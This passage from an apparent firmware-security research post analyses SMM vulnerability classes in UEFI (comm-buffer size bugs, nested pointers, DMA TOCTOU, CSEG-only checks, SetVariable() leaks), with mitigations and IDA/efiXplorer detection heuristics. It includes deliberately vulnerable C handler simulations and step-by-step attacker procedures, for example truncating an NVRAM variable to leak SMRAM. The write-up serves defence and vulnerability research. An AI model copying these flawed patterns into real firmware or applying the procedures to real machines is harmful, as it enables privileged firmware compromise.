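Note the last case in the usage below: a 1-byte buffer placed at SMRAM - 1 passes the check cleanly, which is precisely the property the next vulnerability class abuses.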

Alas, since the size of the communication buffer is also under the attacker’s control this check on its own is not enough to guarantee sound protection and some additional responsibilities lay on the shoulders of the firmware developers. As we will see shortly, many SMI handlers fail here and leave a gap attackers can exploit to violate this restriction and corrupt the bottom portion of SMRAM. To understand how, let’s take a closer look at a concrete example:

Figure 10 – A vulnerable SMI handler

Above we have a real-life, very simple SMI handler. We can divide its operation into 4 discrete steps:

  1. Sanity checking the arguments.
  2. Reading the value of the MSR_IDT_MCR5 register into a local variable.
  3. Computing a 64-bit value out of it, then writing the result back to the communication buffer.
  4. Return to the caller.

The astute reader will notice that during step 3, an 8-byte value is written to the Comm Buffer, but nowhere during step 1 does the code check for the prerequisite that the buffer is at least 8 bytes long. Because this check is omitted, an attacker can exploit this by:

  1. Placing the Comm Buffer in a memory location as adjacent as possible to the base of SMRAM (say SMRAM – 1).
  2. Setting the size of the Comm Buffer to a small enough integer value, say 1 byte.
  3. Triggering the vulnerable SMI.

Schematically, the memory layout would look as follows:
Figure 11 – Memory layout at the time of SMI invocation

As far as SmmEntryPoint is concerned, the Comm Buffer is just 1 byte long and does not overlap with SMRAM. Because of that, SmmIsBufferOutsideSmmValid() will succeed and the actual SMI handler will be called. During step 3, the handler will blindly write a QWORD value into the Comm Buffer, and by doing so it will unintentionally write over the lower 7 bytes of SMRAM as well.

Figure 12 – Memory layout at the time of corruption
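This bypass can be reproduced in miniature. The sketch below is a contrived simulation: a byte array models the bottom of SMRAM, the single guard byte before it models the attacker's 1-byte comm buffer at SMRAM - 1, and the handler blindly writes a QWORD without consulting the size argument, just like the vulnerable handler above.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdbool.h>

/* memory[0] = attacker's comm buffer at "SMRAM - 1"; memory[1..] = the
 * bottom 16 bytes of simulated SMRAM. */
static uint8_t memory[1 + 16];
static uint8_t *const comm_buffer = &memory[0];
static uint8_t *const smram       = &memory[1];

/* Entry-point check: true only if [buf, buf+size) does not touch SMRAM. */
static bool outside_smram(const uint8_t *buf, size_t size) {
    return buf + size <= smram;
}

/* Vulnerable handler: never verifies that comm_size >= 8 before the
 * 8-byte write, mirroring the omitted check in the real handler. */
static void vulnerable_smi_handler(uint8_t *comm, size_t comm_size) {
    (void)comm_size;                          /* the missing check */
    uint64_t result = 0x4141414141414141ULL;  /* e.g., an MSR-derived value */
    memcpy(comm, &result, sizeof result);     /* 8 bytes into a 1-byte buffer */
}
```

With a declared size of 1, the entry-point check passes, yet the handler's write spills 7 bytes past the buffer into simulated SMRAM.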

Based on EDK2, the bottom portion of TSEG (the de-facto standard location for SMRAM), contains a structure of type SMM_S3_RESUME_STATE whose job is to control recovery from the S3 sleep state. As can be seen below, this structure contains a plethora of members and function pointers whose corruption can benefit the attacker.

Figure 13 – Definition for the SMM_S3_RESUME_STATE object, source: EDK2


To mitigate this class of vulnerabilities, SMI handlers must explicitly check the size of the provided communication buffer and bail out in case the actual size differs from the expected size. This can be achieved in one of two ways:

  1. Dereferencing the provided CommBufferSize argument and then comparing it to the expected size. This method works because we already saw that SmmEntryPoint calls SmmIsBufferOutsideSmmValid(CommBuffer, *CommBufferSize), which guarantees *CommBufferSize bytes of the buffer are located outside of SMRAM.

    Figure 14 – Mitigating low SMRAM corruption can be achieved simply by checking the CommBufferSize argument

  2. Calling SmmIsBufferOutsideSmmValid() on the Comm Buffer again, this time with the concrete size expected by the handler.
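Option 1 can be sketched as follows. The handler shape and status codes are simplified stand-ins for the EFI_SMM_HANDLER_ENTRY_POINT2 prototype and EFI_STATUS values; the essential point is the dereference of the size argument before any write.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Simplified stand-ins for EFI_STATUS values. */
#define EFI_SUCCESS            0
#define EFI_INVALID_PARAMETER  2

/* Fixed handler: dereferences the size argument and bails out unless the
 * buffer is large enough for the QWORD it intends to write. Because the
 * entry point already validated *comm_size bytes as lying outside SMRAM,
 * this check alone closes the low-SMRAM-corruption window. */
static int fixed_smi_handler(uint8_t *comm, const size_t *comm_size) {
    if (comm == NULL || comm_size == NULL ||
        *comm_size < sizeof(uint64_t))
        return EFI_INVALID_PARAMETER;   /* reject undersized buffers */

    uint64_t result = 0x1122334455667788ULL;
    memcpy(comm, &result, sizeof result);
    return EFI_SUCCESS;
}
```

A 1-byte buffer is now rejected before the write ever happens, while a properly sized buffer is serviced as before.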


To detect this class of vulnerabilities, we should be looking for SMI handlers that don’t properly check the size of the Comm Buffer, that is, handlers that do neither of the following:

  1. Dereferences the CommBufferSize argument.
  2. Calls SmmIsBufferOutsideSmmValid() on the communication buffer.

Condition 1 is straightforward to check because efiXplorer already takes care of locating SMI handlers and assigning them their correct function prototype. Condition 2 is also easy to validate, but the crux is this: since SmmIsBufferOutsideSmmValid() is statically linked to the code, we must be able to identify it in the compiled binary. Some tips and tricks for doing so can be found in the next section.

Arbitrary SMRAM Corruption


While certainly a big step forward in our analysis of SMM vulnerabilities, the previous bug class still suffers from several significant limitations that hinder it from being easily exploited in real-life scenarios. A better, more powerful exploitation primitive will allow us to corrupt arbitrary locations within SMRAM, not only those that are adjacent to the bottom.

Such exploitation primitives can often be found in SMI handlers whose communication buffers contain nested pointers. Since the internal layout of the communication buffer is not known a priori, it is the responsibility of the SMI handler itself to correctly parse and sanitize it, which usually boils down to calling SmmIsBufferOutsideSmmValid() on nested pointers and bailing out if one of them happens to overlap with SMRAM. A textbook example for properly checking these conditions can be found in the SmmLockBox driver from EDK2:

Figure 15 – the sub-handler for SmmLockBoxSave sanitizes nested pointers

To report back to the OS that certain best practices have been implemented in SMM, a modern UEFI firmware usually creates and populates an ACPI table called the Windows SMM Mitigations Table, or WSMT for short. Among other things, the WSMT maintains a flag called COMM_BUFFER_NESTED_PTR_PROTECTION that, if present, asserts that no nested pointers are used by SMI handlers without prior sanitization. This table can be dumped and parsed using the chipsec module common.wsmt:

Figure 16 – Using CHIPSEC to dump and parse the contents of the WSMT table

Unfortunately, practice has shown that more often than not, the correlation between reported mitigations and reality is tenuous at best. Even when the WSMT is present and reports all the supported mitigations as active, it's not uncommon to discover SMM drivers that completely forget to sanitize the communication buffer. Leveraging this, attackers can trigger the vulnerable SMI with a nested pointer pointing to SMRAM memory. Depending on the nature of the particular handler, this can result in either corruption of the specified address or disclosure of sensitive information read from that address. Let's take a look at an example.

Figure 17 – An SMI handler that does not sanitize nested pointers, leaving it vulnerable to memory corruption attacks

In the snippet above, we have an SMI handler that gets some arguments via the communication buffer. Based on the decompiled pseudocode, we can deduce that the first byte of the buffer is interpreted as an OpCode field that instructs the handler what it should do next (1). As can be seen (2), valid values for this field are either 0, 2, or 3. If the actual value differs from those, the default clause (3) will be executed. In this clause, an error code is written to the memory location pointed to by the 2nd field of the comm buffer. Since this field is under the attacker’s control along with the entire contents of the communication buffer, he or she can set it up as follows prior to triggering the SMI:

Figure 18 – Contents of the communication buffer that lead to SMRAM corruption

As the handler executes, the value of the OpCode field will force it to fall back into the default clause, while the address field will be selected in advance by the attacker depending on the exact portion of SMRAM he or she wants to corrupt.
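Since the decompiled snippet itself is only shown as a figure, here is a rough self-contained C model of the pattern just described; the structure layout and error code are hypothetical:

```c
#include <assert.h>
#include <stdint.h>

#define ERROR_UNSUPPORTED 0xEE  /* hypothetical error code */

/* Model of the vulnerable handler: the first byte of the comm buffer
 * is an OpCode, and unknown opcodes cause an error code to be written
 * through a nested, attacker-controlled pointer with no overlap check. */
typedef struct {
  uint8_t  OpCode;        /* (1) dispatch field             */
  uint64_t StatusAddress; /* nested pointer, never sanitized */
} COMM_BUFFER;

void VulnerableHandler(COMM_BUFFER *Comm) {
  switch (Comm->OpCode) {
  case 0:
  case 2:
  case 3:
    /* (2) legitimate operations elided */
    break;
  default:
    /* (3) arbitrary 1-byte write: StatusAddress may point anywhere,
     * including into SMRAM */
    *(uint8_t *)(uintptr_t)Comm->StatusAddress = ERROR_UNSUPPORTED;
    break;
  }
}
```

Any OpCode outside {0, 2, 3} drives execution into the default clause, turning the handler into a write-what-where primitive.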


To mitigate this class of vulnerabilities, the SMI handler must sanitize any pointer value passed in the communication buffer prior to using it. The pointer validation can be performed in one of two ways:

  • Calling SmmIsBufferOutsideSmmValid(): As was already mentioned, SmmIsBufferOutsideSmmValid() is a utility function provided by EDK2 that checks whether or not a given buffer overlaps with SMRAM. Using it is the recommended way to sanitize external input pointers.
  • Alternatively, some UEFI implementations based on the AMI codebase don’t use SmmIsBufferOutsideSmmValid(), but rather expose a similar functionality via a dedicated protocol called AMI_SMM_BUFFER_VALIDATION_PROTOCOL. Besides the semantic differences of calling a function versus utilizing a UEFI protocol, both approaches work roughly the same. Please check out the next section to learn how to correctly import this protocol definition into IDA.
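For illustration, here is a minimal, self-contained sketch of the first option. The SMRAM range and the validation stub mimic the semantics of EDK2's SmmIsBufferOutsideSmmValid() but are simplified assumptions, not the real implementation:

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Fake SMRAM range used by the stub below -- illustration only. */
#define SMRAM_BASE 0x80000000ULL
#define SMRAM_SIZE 0x00800000ULL

/* Stub with the same semantics as EDK2's SmmIsBufferOutsideSmmValid():
 * TRUE iff [Buffer, Buffer+Length) does not overlap SMRAM. */
static bool SmmIsBufferOutsideSmmValid(uint64_t Buffer, uint64_t Length) {
  if (Length == 0 || Buffer + Length < Buffer)  /* reject empty/overflowing */
    return false;
  return (Buffer + Length <= SMRAM_BASE) ||
         (Buffer >= SMRAM_BASE + SMRAM_SIZE);
}

typedef struct {
  uint64_t NestedPtr;  /* attacker-controlled nested pointer */
  uint64_t NestedLen;
} COMM_BUFFER;

/* Returns 0 on success, -1 if the nested pointer overlaps SMRAM. */
int SafeHandler(COMM_BUFFER *Comm) {
  if (!SmmIsBufferOutsideSmmValid(Comm->NestedPtr, Comm->NestedLen))
    return -1;  /* bail out: nested pointer reaches into SMRAM */
  /* ... safe to dereference Comm->NestedPtr from here on ... */
  return 0;
}
```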


The basic idea to detect this class of vulnerabilities is to look for SMI handlers that don’t call SmmIsBufferOutsideSmmValid() or utilize the equivalent AMI_SMM_BUFFER_VALIDATION_PROTOCOL. However, some edge cases must also be taken into consideration. Failing to do so might introduce unwanted false positives or false negatives.

  1. Calling SmmIsBufferOutsideSmmValid() on the comm buffer itself: this merely guarantees that the comm buffer does not overlap with SMRAM (see Low SMRAM Corruption above), but it says nothing about the nested pointers. As a result, when trying to assess the robustness of a handler against rogue pointer values, these cases should not be taken into consideration.
  2. Not using nested pointers at all: Some SMI handlers might not call SmmIsBufferOutsideSmmValid() simply because the communication buffer does not hold any nested pointers, but rather other data types such as integers, boolean flags, etc. To distinguish this benign case from the vulnerable one, we must be able to figure out the internal layout of the communication buffer.

    While this can be done manually as part of the reverse engineering process, fortunately for us, nowadays automatic type reconstruction is far from being science fiction, and various tools for doing so are readily available as off-the-shelf solutions. The two most prominent and successful IDA plugins in this category are HexRaysPyTools and HexRaysCodeXplorer. Using any of these tools lets you transform raw pointer access notation such as the following:

    Figure 20 – SMI handler using the raw CommBuffer

    Into a more friendly and comprehensible point-to-member notation:

    Figure 21 – SMI handler using the reconstructed CommBuffer

    Even more importantly, these plugins keep track of how individual fields are being accessed. Based on the access pattern, they are fully capable of reconstructing the layout of the containing structure. This includes extrapolating the number of members, their respective sizes, types, attributes, and so on. When applied to the Comm Buffer, this method lets you quickly discover if it holds any nested pointers.

    Figure 22 – The reconstructed CommBuffer as extrapolated by HexRaysCodeXplorer. Notice this structure holds two members which are nested pointers

TOCTOU attacks


Sometimes, even calling SmmIsBufferOutsideSmmValid() on nested pointers is not enough to make an SMI handler fully secure. The reason for this is that SMM was not designed with concurrency in mind and as a result, it suffers from some inherent race conditions, the most prominent one being TOCTOU attacks against the communication buffer. Because the comm buffer itself resides outside of SMRAM, its contents can change while the SMI handler is executing. This fact has serious security implications as it means double-fetches from it won’t necessarily yield the same values.

In an attempt to remedy this, SMM in multiprocessing environments follows what’s known as an “SMI rendezvous”. In a nutshell, once a CPU enters SMM a dedicated software preamble will send an Inter-Processor-Interrupt (IPI) to all other processors in the system. This IPI will cause them to enter SMM as well and wait there for the SMI to complete. Only then can the first processor safely call the handler function to actually service the SMI.

This scheme is highly effective in preventing other processors from meddling with the communication buffer while it is being used, but of course, CPUs are not the only entities with access to the memory bus. As any OS 101 course teaches, many hardware devices nowadays are capable of acting as DMA agents, meaning they can read and write memory without going through the CPU at all. This is great news performance-wise, but terrible news as far as firmware security is concerned.

Figure 23 – DMA-aware hardware can modify the contents of the comm buffer while an SMI is executing, source: Dell Firmware Security

To see how DMA operations can assist exploitation, let’s take a look at the following snippet taken from a real-life SMI handler:

Figure 24 – SMI handler that is vulnerable to a TOCTOU attack

As can be seen, this handler references a nested pointer that we named field_18 in at least 3 different locations:

  1. First, its value is retrieved from the comm buffer and saved into a local variable in SMRAM.
  2. Then, SmmIsBufferOutsideSmmValid() is called on the local variable to make sure it does not overlap SMRAM.
  3. If deemed safe, the nested pointer is re-read from the comm buffer and then passed to CopyMem() as the destination argument.
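The three steps above can be simulated with a small, self-contained model. The validation stub and the "DMA hook" that fires inside the race window are illustration devices (with a made-up SMRAM range), not real firmware APIs:

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Fake SMRAM range used by the validation stub -- illustration only. */
#define SMRAM_BASE 0x80000000ULL
#define SMRAM_SIZE 0x00800000ULL

static bool SmmIsBufferOutsideSmmValid(uint64_t Buffer, uint64_t Length) {
  return (Buffer + Length <= SMRAM_BASE) ||
         (Buffer >= SMRAM_BASE + SMRAM_SIZE);
}

typedef struct { uint64_t FieldPtr; } COMM_BUFFER;
typedef void (*DMA_HOOK)(COMM_BUFFER *);

/* Returns the pointer the handler would hand to CopyMem(). The hook
 * simulates a DMA write landing between the check and the second fetch. */
uint64_t DoubleFetchHandler(COMM_BUFFER *Comm, DMA_HOOK RaceWindow) {
  uint64_t Checked = Comm->FieldPtr;           /* fetch #1: validated     */
  if (!SmmIsBufferOutsideSmmValid(Checked, 8))
    return 0;                                  /* reject overlapping ptr  */
  if (RaceWindow)
    RaceWindow(Comm);                          /* the TOCTOU window       */
  return Comm->FieldPtr;                       /* fetch #2: actually used */
}

/* Simulated DMA agent: swap the pointer to an SMRAM address. */
void DmaAttack(COMM_BUFFER *Comm) { Comm->FieldPtr = SMRAM_BASE + 0x40; }
```

Even though the first fetch passes validation, the value actually used is the second, attacker-replaced one.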

As was mentioned earlier, nothing guarantees consecutive reads from the comm buffer will necessarily yield the same value. That means an attacker can issue this SMI with the pointer referencing a perfectly safe location outside of SMRAM:

Figure 25 – Initial layout of the communication buffer at the time of issuing the SMI

However, right after the SMI validates the nested pointer and just before it is fetched again, there exists a small window of opportunity during which a DMA attack can modify its value to point somewhere else. Knowing that the pointer will soon be passed to CopyMem(), the attacker could make it point to an address in SMRAM he or she wants to corrupt.

Figure 26 – A malicious DMA device can modify the pointer inside the CommBuffer to point somewhere else, potentially to SMRAM memory


If configured properly by the firmware, SMRAM should be shielded from tampering by DMA devices. To make sure that’s the case on your machine, run the smm_dma module from CHIPSEC.

Figure 27 – Checking that SMRAM is protected from DMA attacks

Because of that, TOCTOU vulnerabilities can be mitigated simply by copying data from the communication buffer into local variables that reside in SMRAM. As always, a good reference for the proper coding style is EDK2:

Figure 28 – Copying data from the comm buffer into local variables in SMRAM, source: SmmLockBox.c

Once all the required pieces of data are copied into SMRAM that way, DMA attacks won’t be able to influence the execution flow of SMI handlers:

Figure 29 – If configured properly, SMRAM should be protected from tampering by DMA devices
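In code, the copy-then-validate pattern boils down to fetching each field exactly once into an SMRAM-resident local. A minimal self-contained sketch, using a simplified validation stub with a made-up SMRAM range:

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Fake SMRAM range used by the validation stub -- illustration only. */
#define SMRAM_BASE 0x80000000ULL
#define SMRAM_SIZE 0x00800000ULL

static bool SmmIsBufferOutsideSmmValid(uint64_t Buffer, uint64_t Length) {
  return (Buffer + Length <= SMRAM_BASE) ||
         (Buffer >= SMRAM_BASE + SMRAM_SIZE);
}

typedef struct { uint64_t FieldPtr; } COMM_BUFFER;

/* Fetch once into a local (which lives in SMRAM), validate the local,
 * and use only the local from that point on. Later DMA writes to the
 * comm buffer can no longer influence the value that gets used. */
uint64_t SafeSingleFetch(const COMM_BUFFER *Comm) {
  uint64_t Local = Comm->FieldPtr;        /* the one and only fetch */
  if (!SmmIsBufferOutsideSmmValid(Local, 8))
    return 0;                             /* reject overlapping ptr */
  return Local;                           /* e.g. destination for CopyMem() */
}
```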


Detecting TOCTOU vulnerabilities in SMI handlers requires reconstructing the internal layout of the communication buffer, then counting how many times each field is being fetched. If the same field is being fetched twice or more by the same execution flow, chances are the respective handler is susceptible to such attacks. The severity of these issues greatly depends on the types of individual fields, with pointer fields being the most acute ones. Again, properly reconstructing the structure of the Comm Buffer greatly helps in assessing the potential risk.

CSEG-only Aware Handlers


As mentioned in previous posts in the series, the de-facto standard location for SMRAM memory is the "Top Memory Segment", often abbreviated as TSEG. Still, on many machines, a separate SMRAM region called CSEG (Compatibility Segment) co-exists with TSEG for compatibility reasons. Unlike TSEG, whose location in physical memory can be programmed by the BIOS, the location of the CSEG region is fixed to the address range 0xA0000-0xBFFFF. Some legacy SMI handlers were designed with only CSEG in mind, a fact that can be abused by attackers. Below is an example of one such handler:

Figure 30 – An SMI handler with some CSEG-specific protections

Unlike the handlers we reviewed so far, this SMI handler does not get its arguments via the communication buffer. Instead, it uses the EFI_SMM_CPU_PROTOCOL to read registers from the SMM save state, created automatically by the CPU upon entering SMM. Therefore, the potential attack surface in this example is not the communication buffer, but rather the general-purpose registers of the CPU, whose values can be set almost arbitrarily prior to issuing the SMI.

The handler goes as follows:

  1. First, it reads the values of the ES and EBX registers from the save state.
  2. Then, it computes a linear address from them using the formula: 16 * ES + (EBX & 0xFFFF).
  3. Finally, it checks that the computed address does not fall within the bounds of CSEG. If the address is considered safe, it is passed as an argument to the function at 0x3020.

Note that the handler essentially re-implements common utility functions such as SmmIsBufferOutsideSmmValid(), only it does so in a poor way that completely neglects SMRAM segments other than CSEG. Theoretically, attackers can set the ES and EBX registers such that the computed linear address points to some other SMRAM region such as TSEG, yet still passes the safety checks imposed by the handler.

In practice, however, chances are this vulnerability is not realistically exploitable. The reason is that the maximum linear address we can reach is limited to 16 * 0xFFFF + 0xFFFF == 0x10FFEF, and experience shows that TSEG is usually located at much higher addresses. Nevertheless, it is good to be aware of such handlers and the danger they pose.
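The bound cited above follows directly from the address formula. A tiny self-contained check:

```c
#include <assert.h>
#include <stdint.h>

/* Real-mode style linear address computed by the handler:
 * 16 * ES + (EBX & 0xFFFF). */
static uint32_t LinearAddress(uint16_t Es, uint32_t Ebx) {
  return 16u * Es + (Ebx & 0xFFFFu);
}
```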


Mitigating these vulnerabilities is entirely up to the developers of the SMI handler.


A good strategy to pinpoint these cases is to look for SMI handlers that make use of "magic numbers" that reference some unique characteristics of CSEG. These include immediate values such as 0xA0000 (the physical base address of CSEG), 0x1FFFF (the offset of its last byte, often used as a mask), and 0xBFFFF (its last addressable byte). Based on our experience, a function that uses two or more of these values is likely to have some CSEG-specific behavior and must be examined carefully to assess its potential risk.

SetVariable() Information Disclosure


All the bug classes described so far were centered around hijacking the SMM execution flow and corrupting SMM memory. Yet another very important category of vulnerabilities revolves around disclosing the contents of SMRAM. It is a known fact that SMRAM cannot be read from outside of SMM, which is why it is sometimes used by the firmware to store secrets that must be kept hidden from the outside world. In addition to that, disclosing the contents of SMRAM can also help with the exploitation of other vulnerabilities that require accurate knowledge of the memory layout.

A common scenario for SMRAM disclosure happens when SMM code tries to update the contents of an NVRAM variable. In UEFI, updating an NVRAM variable is not an atomic operation, but rather a composite one made out of the following steps:

  1. Allocating a stack buffer that will hold the data associated with the variable.
  2. Using the GetVariable() service to read the contents of the variable into the stack buffer.
  3. Performing all the required modifications on the stack buffer.
  4. Using the SetVariable() service to write the modified stack buffer back to NVRAM.
Figure 31 – UEFI code that demonstrates updating a UEFI variable. Source: TCGSmm

When calling GetVariable(), note that the 4th parameter is used as an input-output argument. Upon entry, this argument signifies the number of bytes the caller is interested in reading, while on return it is set to the number of bytes that were read from NVRAM in practice. In case the actual size of the variable matches the expected one, both values should be the same.
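To make the in/out semantics concrete, here is a self-contained model with in-memory stand-ins for GetVariable()/SetVariable(). The stubs keep only the size behavior described above and are not the real UEFI services; the update routine shows the safe pattern of writing back the size actually read:

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define VAR_CAPACITY 0x40

static uint8_t  g_store[VAR_CAPACITY];  /* fake NVRAM backing store */
static uint64_t g_stored_size = 0;

/* Stub with GetVariable()'s in/out size semantics: on return, *DataSize
 * holds the number of bytes actually read, which may be smaller than
 * the caller expected if the variable was truncated. */
static int GetVariableStub(void *Data, uint64_t *DataSize) {
  uint64_t n = g_stored_size < *DataSize ? g_stored_size : *DataSize;
  memcpy(Data, g_store, n);
  *DataSize = n;
  return 0;
}

static int SetVariableStub(const void *Data, uint64_t DataSize) {
  memcpy(g_store, Data, DataSize);
  g_stored_size = DataSize;
  return 0;
}

/* Safe update: write back only the bytes GetVariable() actually read,
 * never a hardcoded size -- so uninitialized stack bytes never leak. */
int UpdateVariable(void) {
  uint8_t  buf[VAR_CAPACITY];           /* uninitialized, like the stack buffer */
  uint64_t size = sizeof(buf);
  if (GetVariableStub(buf, &size) != 0)
    return -1;
  if (size > 0)
    buf[0] ^= 1;                        /* the "modification" step */
  return SetVariableStub(buf, size);    /* actual size, not sizeof(buf) */
}
```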

A problem arises when developers implicitly assume the size of a variable to be immutable. Due to this assumption, they completely ignore the number of bytes read by GetVariable() and just pass a hardcoded size to SetVariable() when writing the updated contents:

Figure 32 – the code above implicitly assumes the size of CpuSetup will always be 0x101A, so it doesn’t bother to check the number of bytes actually read by GetVariable()

Since the contents of some NVRAM variables (at least those that have the EFI_VARIABLE_RUNTIME_ACCESS attribute) can be modified from the operating system, they can be abused to trigger information disclosures in SMM while simultaneously serving as the exfiltration channel. Let's see how this can be done in practice.

First, the attacker would use an OS-provided API function such as SetFirmwareEnvironmentVariable() to truncate the variable, making it shorter than expected. Then, they would trigger the vulnerable SMI handler. The SMI handler will:

  1. Allocate the stack-based buffer. Like any other stack-based allocation, this buffer is uninitialized by default, meaning it holds leftovers from previous function calls that took place in SMM.
    Figure 33 – Side-by-side depiction of the NVRAM variable and the stack buffer (phase 1)
  2. Call the GetVariable() service to read the contents of the variable into the stack buffer. Normally, the size of the variable is equal to the size of the stack buffer, but since the attacker just truncated the variable in NVRAM, the buffer is surely longer. This in turn means it will continue to hold some uninitialized bytes even after GetVariable() returns.
    Figure 34 – Side-by-side depiction of the NVRAM variable and the stack buffer (phase 2)
  3. Modify the stack buffer in memory.
    Figure 35 – Side-by-side depiction of the NVRAM variable and the stack buffer (phase 3)
  4. Call the SetVariable() service to write back the modified stack buffer into NVRAM. Because this call is done using the hardcoded, constant size of the stack buffer, it will also write to NVRAM its uninitialized part.
    Figure 36 – Side-by-side depiction of the NVRAM variable and the stack buffer (phase 4)

To complete the process, the attacker can now use an API function such as GetFirmwareEnvironmentVariable() to fully disclose the contents of the variable, including the bytes that originate from the uninitialized portion.


The moral of this story is that NVRAM variables are not to be trusted blindly and should be taken into account when reasoning about the attack surface of the handler. If applicable, use compiler flags such as InitAll to make sure stack buffers will be zero-initialized. More tactically, when updating the contents of NVRAM variables the code must always take into account the actual size of the variable and not rely on a static, pre-computed value.

Yet another possible direction to mitigate these issues is to limit access to NVRAM variables. This can be done either by removing the EFI_VARIABLE_RUNTIME_ACCESS attribute entirely or using a protocol such as EDKII_VARIABLE_LOCK_PROTOCOL to make variables read-only.


It's reasonable to assume that an NVRAM variable update operation takes place within a single function. That means we can usually ignore scenarios in which one function reads the variable and another one writes it. To locate these functions, after analyzing the input file with efiXplorer, navigate to the "services" tab and search for pairs of calls where GetVariable() is immediately followed by SetVariable():

Figure 37 – Searching for pairs of calls to GetVariable() and SetVariable()

For each such pair of calls, check that:

  1. Both calls originate from the same function
  2. Both calls operate on the same NVRAM variable
  3. The size argument passed to SetVariable() is an immediate value
Figure 38 – Simple heuristics to detect SMRAM info leaks

Identifying Library Functions

This post freely references library functions such as FreePool() and SmmIsBufferOutsideSmmValid() and naively assumes we can locate them without any hassle. The problem is these functions are statically linked to the binary, and normally SMM images are stripped of any debug symbols before being shipped to end-users. Due to that, locating them inside the IDA database is quite challenging.

During our work, we researched multiple approaches to tackle this problem, including automated diffing using Diaphora as well as experimentation with some lesser-known plugins such as rizzo and fingermatch. Eventually, we decided to stick to the KISS principle and perform the matching using plain and simple heuristics that take into consideration some of the unique characteristics of the target function. Below are some rules-of-thumb for matching the functions referenced earlier. Note that we assume the binary was already analyzed by efiXplorer, which makes things a bit easier.


Identifying FreePool() is pretty straightforward. All it takes is to scan the IDA database for a function that:

  • Receives one integer argument.
  • Conditionally calls either gBs->FreePool() or gSmst->FreePool() (but never both).
  • Forwards its input argument to both of these services.

Figure 39 – Simple heuristic to pinpoint FreePool()


Identification of SmmIsBufferOutsideSmmValid() is a bit trickier. To successfully pull this off, we need to have some background information about a UEFI protocol called EFI_SMM_ACCESS2_PROTOCOL. This protocol is used to manage and query the visibility of SMRAM on the platform. As such, it exposes the respective methods to open, close, and lock SMRAM.

Figure 40 – Interface definition for EFI_SMM_ACCESS2_PROTOCOL, source: Step to UEFI

In addition to those, this protocol also exports a method called GetCapabilities(), which can be used by clients to figure out exactly where SMRAM lives in physical memory.

Figure 41 – Documentation of the GetCapabilities() function, source: Step to UEFI

Upon return, this function fills an array of EFI_SMRAM_DESCRIPTOR structures that tell the caller what regions of SMRAM are available, what is their size, state, etc.

Figure 42 – Output of a sample program that uses EFI_SMM_ACCESS2_PROTOCOL to query SMRAM ranges, source: Step to UEFI

In EDK2, the common practice is to store these EFI_SMRAM_DESCRIPTORs as global variables so that other functions can easily access them in the future. As you probably guessed, one of these functions is none other than SmmIsBufferOutsideSmmValid(), which iterates over the descriptor list to decide if the caller-provided buffer is safe:

Figure 43 – Source code for SmmIsBufferOutsideSmmValid, source: SmmMemLib.c

Taking this into consideration, our strategy for identifying SmmIsBufferOutsideSmmValid() is a reverse lookup: first, we'll find the global SMRAM descriptors initialized by EFI_SMM_ACCESS2_PROTOCOL, and only then, based on the functions that use them, deduce which one is the most promising candidate to be SmmIsBufferOutsideSmmValid().

Technically, one can do so by following these simple steps:

  • Go to the “protocols” tab in efiXplorer and double click EFI_SMM_ACCESS2_PROTOCOL. This will cause IDA to jump to the location where this GUID is utilized (usually the call to LocateProtocol)
    Figure 44 – Searching for EFI_SMM_ACCESS2_PROTOCOL in IDA
  • Click on the protocol’s interface pointer (EfiSmmAccess2Protocol) and hit ‘x’ to search for its xrefs:
    Figure 45 – Listing the cross-references to EfiSmmAccess2Protocol
  • For each call to GetCapabilities(), check if the 3rd parameter (the SMRAM descriptor) is a global variable. If it is, do the following:
    • Hit ‘n’ to rename it according to some naming convention (say, SmramDescriptor_XXX, where XXX is an ordinal) to allow for easy reference in the future
    • Hit ‘y’ and set its variable type to EFI_SMRAM_DESCRIPTOR *

    Figure 46 – Renaming and setting the type for the SMRAM descriptors

  • Now check the following criteria for each function in the database.
    1. The function must receive two integer arguments
    2. The function must return a boolean value. From the perspective of the decompiler, boolean values are just plain integers, so to make this distinction we should go over all the return statements in the function and check that the returned value is a member of the set {0,1}.
    3. The function must reference one of the SMRAM descriptors that were marked in the previous step

If all three conditions are met, chances are the function you’re looking at is actually SmmIsBufferOutsideSmmValid():

Figure 47 – Locating SmmIsBufferOutsideSmmValid() in compiled SMM binaries using simple heuristics


Currently, efiXplorer does not support the definition of AMI_SMM_BUFFER_VALIDATION_PROTOCOL out of the box, so we must import the protocol definition separately.

Figure 48 – AMI_SMM_BUFFER_VALIDATION is not supported out of the box

To accomplish this, follow these steps:

  1. Download the protocol header file from GitHub and save it locally.
  2. Open an IDAPython prompt and run the following snippet:
    Figure 49 – Defining some C macros to enable importing the protocol header

    This is necessary because the header file makes use of several macros and typedefs that must be #defined manually before importing it.
  3. Navigate to the File->Import C header file menu to import the header.
    Figure 50 – Importing the header file
  4. Run efiXplorer again (hotkey: CTRL+ALT+E) and notice how the decompilation output changes:
    Figure 51 – AMI_SMM_BUFFER_VALIDATION is now recognized


“The more you look, the more you see.”
– Robert M. Pirsig, Zen and the Art of Motorcycle Maintenance

Firmware-level attacks pose a significant challenge to the security community. As part of the everlasting cat-and-mouse game between attackers and defenders, threat actors are starting to shift their spotlight to the firmware, considered by many the soft underbelly of the IT stack. In recent years, awareness of firmware threats has been steadily increasing, and some promising approaches are emerging to combat them:

  • Hardware vendors such as Intel are constantly adding more security features to each new line of CPUs. The important advantage of these features is that they're baked into the hardware and are capable of eliminating certain bug classes from the ground up (or at least making exploitation much harder). The downside of this approach is that due to the fragmented nature of the industry, not every feature supported by the hardware gets widespread adoption on the software side. While certain features such as Secure Boot, Boot Guard, and BIOS Guard are highly popular and can be found in the majority of commodity machines, other features such as STM (SMI Transfer Monitor, a technology intended to de-privilege SMM) were left as merely a PoC.
  • OS vendors such as Microsoft are collaborating intensely with leading OEMs to help bridge the gap between firmware security and OS security, a mandatory move given their long-term vision of harnessing virtualization to protect every Windows machine. The outcome of these endeavors is the line of Secured-Core PCs, which come preloaded with security features and configurations that are aimed at narrowing down the firmware attack surface as well as constricting the damage in case of an attack.
  • EDR vendors also contribute their part and are starting to tap into the firmware and provide visibility into the SPI flash memory and the EFI system partition. This approach is great for spotting IOCs of known firmware implants, but unfortunately is rather restricted when it comes to detecting the underlying vulnerabilities that enabled the infection in the first place.

